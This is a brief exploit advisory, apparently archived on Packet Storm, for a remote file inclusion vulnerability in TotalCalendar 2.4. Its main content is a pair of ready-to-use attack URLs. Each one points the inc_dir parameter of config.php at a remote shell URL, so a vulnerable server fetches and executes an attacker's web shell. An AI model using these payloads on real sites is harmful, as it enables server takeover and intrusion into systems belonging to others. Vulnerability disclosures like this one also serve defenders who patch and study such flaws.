TotalCalendar version 2.4 suffers from a remote file inclusion vulnerability.
19cef203067fc58835631548d3dd123059b4552c87d9fa9c5b7f8115336685b2//***********************************************************************//
//**********************1 9 2 3 T U R K - G R U P************************//
//_______________________________________________________________________//
//-----------------------------------------------------------------------//
<--[+]-->
[~] Home Page : "http://www.simpoe.com/"
[~] Download : "http://www.simpoe.com/calendre/TotalCalendar_2.4.zip"
[~] ScriptName: "Simpoe Event Calendar"
[~] Date: "20/04/2009"
[~] Time: "18:38"
<--[!]-->
[+] Bugs : Remote File Include
[+] D0rk : Not Dork :(
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[+] Contact : darkdewil@1923turk.biz
[!] Note : You're too important for anyone <1923Turk>
<--[-]-->
(+)Vuln:
http://www.sitename.com/calendre/config.php?inc_dir=ShellURL
OR
http://www.sitename.com/config.php?inc_dir=ShellURL
//***********************************************************************//
//***********************************************************************//
//***********************************************************************//
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed